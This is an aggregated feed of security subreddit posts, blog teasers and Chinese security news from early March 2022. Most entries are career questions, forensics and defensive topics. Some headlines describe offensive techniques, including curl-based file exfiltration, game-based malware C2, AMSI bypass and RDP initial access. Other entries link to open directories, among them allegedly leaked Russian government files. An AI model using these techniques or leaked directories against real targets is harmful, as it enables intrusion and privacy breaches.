    ​ ​ https://46.mangovideo.pw/contents/videos/ http://server217.mangovideo.pw/contents/videos/ https://177.mangovideo.pw/contents/videos/ https://68.mangovideo.pw/contents/videos/ https://server9.mangovideo.pw/contents/videos/ https://45.mangovideo.pw/contents/videos/ https://new.mangovideo.pw/contents/videos/ https://5.mangovideo.pw/contents/videos/ https://234.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ https://31.mangovideo.pw/contents/videos/ https://60.mangovideo.pw/contents/videos/ https://s10.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
    I recently disclosed a unauthenticated RCE to a company that provides virtual network appliances, the process was going good and they patched the vulnerability, but upon my request for patch release/notes they ghosted me. I already have CVE numbers assigned but would like to have mitre publish them but don't know what to do if the company is not being cooperative, anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
    Hi , I'm working for a company which is ISO 27001:2013 certified and i was asked to do a GAP analysis on ISO 27001:2021 stranded. So If there are any useful article or any references , please share it. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
    Hey all, Wondering what your thoughts are on kaspersky as an AV tool, and as a company given recent events. Do you think with all the independent reviewers that they could still be compromised by say KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
    One fine day I was Scrolling through tweets and my eyes got a tweet that Dan Conn tweeted a osint challenge on Oct 5, 2021 mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

    FreeBuf早报 | 乌研究员泄露 Conti 勒索软件源代码;苹果禁用俄 iPhone 核心功能
    苹果表示,在俄罗斯对乌克兰发动攻击后,它已经停止在俄罗斯销售其产品并限制苹果支付功能。
    快速定位挖矿木马!
    挖矿木马最大的一个特征就是cpu资源占用非常高,top命令查看cpu情况,可以看出xmr这个进程占用cpu资源很高。
    什么是SDK,它是怎样威胁我们的隐私?
    截至目前,尚有107款APP未完成整改,洋码头、中公教育等APP在列。

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidently wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, ect. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and its not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
    I read two books about web application security. Web Application Security: Exploitation and Countermeasures for Modern Web Applications Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities But I didn't practice enough. I have multiple options to practice it Port Swigger Web Security Academy bWAPP Vulnerability Disclosure Programs on HackerOne As I said I already read books about this topic, maybe I don't need to read PortSwigger Academy Articles. bWAPP is good but it consists lots of vulnerabilities and I can't figure out how to prepare a work plan for that (Because of vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges but I don't even know I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
    I am looking for a solution to work with and detonate potentially malicious files & malware. A isolated (from rest of LAN) malware sandbox .. with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. it seems if I go with this solution I may need a 2nd VM running a Firewall to ensure the Win10VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such a environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
    Hello. I want to use Azure Kubernetes environment for running Azure DevOps build agents. Besides, tried to make the environment secure, by following the principle of least privilege. As a result - Dockerfile and Pod's definition which runs container as an unprivileged user (nobody) on a read only filesystem (except /tmp and /azp paths). What else could be done to improve environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
    Currently I work as SOC analyst, I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and read about different topics, but can't focus, which waste much time and effort. I'm not sure if anyone else faces the same issue and how can I focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
    Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you forsee? VR is already pretty popular, so I'm surprised its not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more, we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
    Every job has pros and cons. What do you think about being a SOC analyst? A lot of people are saying about stress and over working. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
    I've always been puzzled by the idea that hackers are vulnerable themselves? Like how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks \editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
    I was asked the question what vulnerability sweeping, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
    Este artigo tem como objetivo reforçar a importância da realização do hardening e/ou revisão de segurança antes de colocar um servidor de… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
    While testing a web application that used a web GUI over the top of an API, I noted the calls to the API where authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
    On the way to 2nd Bounty XSS and Apache server .
    Hello readers, in this post, we’ll look at XSS and Apache Server furthere on apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
  • Open

    在线社交网络中识别虚假个人资料的动态CNN模型
    在线社交网络 (OSN) 是用于共享各种数据(包括文本、照片和视频)的流行应用程序。 然而,假账户问题是当前 OSN 系统的障碍之一。 攻击者利用虚假帐户分发误导性信息,例如恶意软件、病毒或恶意 UR
    算法推荐管理规定3月1日施行,算法备案系统正式上线
    《规定》明确,应用算法推荐技术,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    Conti支持俄罗斯,乌克兰成员公布了其内部聊天记录
    就在Conti 勒索组织选择支持俄罗斯之后,一名乌克兰籍的成员泄露了6万多条Conti 勒索组织内部聊天的消息。
    FreeBuf早报 | 保险业巨头 AON 周末遭遇网络攻击;莫斯科交易所被网络攻击击落
    微软透露,在入侵前几个小时,乌克兰实体成为了先前未被发现的恶意软件 FoxBlade 的攻击目标。Microsoft 威胁情报中心 (MSTIC) 继续调查针对...的攻击。
    保险业巨头 AON 遭网络攻击
    AON披露他们在2022年2月25日遭受了网络攻击,在报告中,除了发生攻击并影响了有限数量的系统外,AON 没有提供额外的消息。
    丰田日本工厂因供应商遭受网络攻击而停止生产
    因为丰田汽车提供内外饰塑料部件的供应商小岛工业因遭网络攻击,丰田在日工厂从3月1日起暂停生产。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    网络战已经发展成与海、陆、空、天等领域具有相同的领域地位,也被列为“第五战场”。
  • Open

    Demonstration of how use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
    Hi, I am starting windows security research to understand how windows internals works and how one can exploit it. If anyone interested he/she can DM me submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
    I'm a new graduate and I had a job interview for a soc analyst position, one of the question that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady urls/files and use plugins to analyse the emails. But they told me what if the email seems perfect, like a gmail domain, good spelling and formatting and no urls or files attached. In my mind I'm thinking so how is this a phishing email if there is nothing suspicious in it. But I still tried to answer saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email.They answered what if they company has thousands of employees, how is the security team gonna deal with potential hundreds of emails from the employees. At this point I got nothing else to say, what am I supposed to answer in this situation? thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
    Many open source licenses have different rules depending on if the library is used with a SaaS product or an Externally deployed product. Does using an open source library within a Single Page Application architect mean the library is now deployed to the users browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks,can i learn it through programming and GNS3?
    Hi,so on my last infosec interview the guy told me to study more networks,and he suggested studying the content of Network+ . I am trying to learn from Mike Myers ‘s course but struggling badly. There are a lot of theories here and i keep missing a lot of points . So i want to learn it more practically and in parallel learn the theories. I am good with programming and i have GNS3. So my question,can i learn networking and network+ content through network programming and gns3 ? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Google Dork nedir ve nasil kullanılır?
    OSINT teknikleri Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
    Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL:DR  Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rouge RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
    In the digital world everyone using smart device for day to day activity. We’re sharing many information, at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
    Cocinando nuestra receta con powershell y c# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
    I knows it's very easy to modify "Date created" "Date Modified" attribute of a file. Is there any way to know if thee timestamps had been modified? Can I look at list of dates modified? Any logs or tools? Before someone suggests it back up wont help because the last VSS available is before the file was initially created. The file was created within the last 14 days, I have reason to believe that the date has been modified. ​ I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Files from Cleveland State Community Collage
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

    AlbusSec:- Penetration-List 04 File Inclusion
    Hello Members, I hope that you liked Penetration-List Project, Therefore, I worked hard to complete Penetration-list Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
    How anyone could have gotten a free pass to attended @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    微众银行应用安全团队招聘 | 深圳
    微众银行应用安全团队招聘应用安全岗
    乌克兰招募 "IT军 ",俄罗斯 31 实体成为攻击目标
    乌克兰意图组建一支志愿 &amp;amp;amp;quot;IT军队&amp;amp;amp;quot;,对俄罗斯进行网络攻击。
    FreeBuf早报 | Meta封锁俄在乌的官媒体账户;伊朗黑客组织使用新型恶意软件攻击
    乌克兰正在招募一支由白帽黑客组成的志愿IT军队,以对一系列俄罗斯实体发起攻击。
    通配符SSL证书的好处及选购方法
    很多网站因为业务需要,在同一个主域名下通常会有多个子域名。在这种情况下申请SSL证书就要很慎重,既要考虑到网站安全需要,又要考虑经济实惠,首选肯
    光大银行安全处招聘简章
    招聘安全工程师、安全运营、安全管理等岗位。
    安徽省委统战部副部长张启明带队调研全息网御合肥研发基地
    近日,安徽省统战部副部长张启明带队调研全息网御合肥研发基地,着重听取了全息网御自主创新的核心技术,聚焦数据安全的产业定位与合纵连横的生态合作应用场景,并就科技型企业的未来发展进行深入交流。他指出
    GPU巨头英伟达遭“​毁灭性”网络攻击、头号恶意软件关闭其僵尸网络基础设施|2月28日全球网络安全热点
    被称为TrickBot的模块化Windows犯罪软件平台于周四正式关闭其基础设施,此前有报道称其在近两个月的活动停滞期间即将退休。
    欧盟正式公布《数据法案》、乌克兰再遭DDoS攻击、厨具巨头美亚遭攻击内部数据泄露|网络安全周报
    2月23日,欧盟委员会公布了名为《数据法案》(Data Act)的提案,旨在帮助小公司在竞争中赶上大公司,从智能家电到汽车等联网产品产生的非个人数据中获利。
    Portswigger 文件上传系列 File Upload详细笔记
    其实也算是很早就听说了文件上传漏洞,并在一些CTF比赛中做了一些题目,再刷一遍port的吧。
    匿名者组织入侵白俄罗斯铁路内部网络
    匿名者组织入侵白俄网络,并影响起铁路运营。
    英伟达遭遇网络攻击,1TB数据被盗
    攻击影响了公司的开发人员工具和电子邮件系统,并窃取了包括员工在线凭证在内的1TB数据。
    2021年未修补漏洞利用为勒索软件攻击依赖主要切入点
    未修补软件的漏洞利用导致的攻击增加了33%,这是2021年勒索软件攻击者进行攻击最依赖的切入点,在勒索软件攻击原因中占44%。
  • Open

    Invicti Security Adds Software Composition Analysis to Its Industry- Leading AppSec Platform
    With headline-grabbing vulnerabilities such as Log4Shell drawing attention to the risks presented by open-source components, organizations increasingly need application security programs that address this risk. READ MORE
    DAST, IAST, SCA: Deeper coverage in a single scan
    With Invicti SCA as part of your application security program, you can track and secure open-source components for deeper coverage in one single scan. READ MORE
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    File Transfer Filter Bypass: Exe2Hex
    Introduction Exe2hex is a tool developed by g0tmilk which can be found here. The tool transcribes EXE into a series of hexadecimal strings which can The post File Transfer Filter Bypass: Exe2Hex appeared first on Hacking Articles.
    Windows Persistence: Shortcut Modification (T1547)
    Introduction According to MITRE, “Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level The post Windows Persistence: Shortcut Modification (T1547) appeared first on Hacking Articles.
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »
  • Open

    Argo Security Automation with OSS-Fuzz
    Continuous Fuzzing Integration in Argo Continue reading on Argo Project »

  • Open

    Fotoğraflardaki metin nasıl kopyalanır?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    I hate Marinas, It’s too Crowded —OSINT Challenge 21 and 22
    While I was reading some Medium blogs, I came across @Sofia Santos’s blogs (this writeup specifically: Walkthrough — Hacktoria… Continue reading on Medium »
    Gölgene dikkat et: fotoğraftaki gölgelerden fotoğrafın ne zaman çekildiğini nasıl anlarız?
    Açık kaynak istihbaratı’te kullanılan teknikler Continue reading on Medium »
    The Current State of the Cyber War Between Russia and Ukraine — An OSINT Analysis
    Go through the following OSINT analysis courtesy of Dancho Danchev on the current state of the cyber war between Russia and Ukraine. Enjoy! Continue reading on Medium »
  • Open

    Large Amount of IPs coming from Europe
    Hi, Little background info first. I'm a beginner Networking & Security student so I'm not that unfamiliar with stuff, I don't have anything hosted other than a VPN, and I'm using a consumer grade router that's not capable of VLANs, and other good stuff. I may be just a little paranoid but I've been noticing a lot of blocked IP requests from Russia in the security log for my router. Almost 50% of what I found in the log for February 27 is from over there. One of the IPs I found had 32 hits, another had just 9. Coming in second is the US, then there's Switzerland, Germany, Lithuania. From just the couple foreign IPs that I looked up using https://www.abuseipdb.com/, all of them were flagged for high confidence of abuse. I don't have anything against those countries but I was wondering what all that's going on if I should be more concerned than usual. I'd just like my computer and data to remain in once piece. Not sure if I should be saying anything else about my setup on a public post here but could appreciate some advice. Only tech guy in my family so can't ask anyone else. I'm considering just disabling the VPN so I don't have any more open ports, and using iCloud Private Relay or something else when I'm out. I'm aware of Pfsense, and I was considering it, but I just don't want to spend $$$ with inflation, chip shortages, and who knows what else. Anyway thanks in advance. submitted by /u/Expensive-Exit6398 [link] [comments]
    How does cross-browser checking work?
    I am not familiar with technology. But this kinda freaked me out. https://fingerprintjs.com/blog/external-protocol-flooding/ Following the article, I went ahead and did this test, https://schemeflood.com/ I recently installed fedora on my desktop but it showed all the apps I installed on window previously. (it's not a dual boot) Did I mess something up when installing? or is it a vulnerability? submitted by /u/manho1e [link] [comments]
    What are your methods for investigating JA3 & JA3S IOC hits?
    What sites do you use to validate information? Even if the certificate is valid, how are ensuring it’s for that proper site? What if the certificate says self-signed or expired? submitted by /u/pass-the-word [link] [comments]
  • Open

    Qualsys Vulnerability Detection Pipeline
    Article URL: https://qualys-secure.force.com/discussions/s/ Comments URL: https://news.ycombinator.com/item?id=30492601 Points: 2 # Comments: 0
  • Open

    Various governments open directories
